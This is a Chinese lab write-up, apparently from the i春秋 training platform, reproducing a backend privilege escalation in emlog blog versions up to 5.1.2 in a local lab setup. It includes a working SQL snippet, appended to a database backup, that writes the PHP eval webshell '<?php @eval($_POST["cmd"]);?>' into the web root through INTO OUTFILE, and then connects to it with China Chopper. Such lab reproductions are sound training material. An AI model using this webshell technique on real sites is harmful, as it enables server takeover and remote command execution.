安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋)

前言

在提升后台权限之前,需要拥有后台管理员的账户

emlog官网

一、实验环境

实验链接

环境 版本
操作机 Windows XP
emlog版本 小于等于5.1.2
管理员账户 管理员密码
admin password

二、安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋)

访问http://127.0.0.1/emlog/admin?action=phpinfo

安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋) 安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋)

script_filename为当前执行脚本的系统路径,
可以发现emlog网站是搭建在目标服务器的C:/WWW下,之后通过sql命令在C:/WWW/emlog中创建一个一句话木马文件达到连接shell的目的

安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋)

[2]. 下载sql备份

安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋) 安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋) 安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋) 安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋)
  • .sql的数据库备份文件末尾添加sql语句
  • 作用是在数据库中创建一个test表name字段来存储一句话木马,并将一句话木马输出保存为一个.php文件
安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋)
drop table if exists test; --创建test表 create table test(name varchar(100)); --创建test表的name字段,name字段为可变长字符串类型 insert into test (name) values ('<?php @eval($_POST["cmd"]);?>'); --为name字段赋值  select name from test into outfile "C:/WWW/emlog/test.php"; --查询test表name字段的值,并输出到文件test.php中 

[3]. 导入sql备份

导入之前的.sql备份文件

安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋) 安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋) 安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋) 安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋)

在导入sql备份时将会执行之前添加在末尾的sql语句,在服务器生成一句话木马文件C:WWWemlogtest.php

安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋) 安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋)

[4]. 连接shell

菜刀连接一句话木马

安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋) 安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋)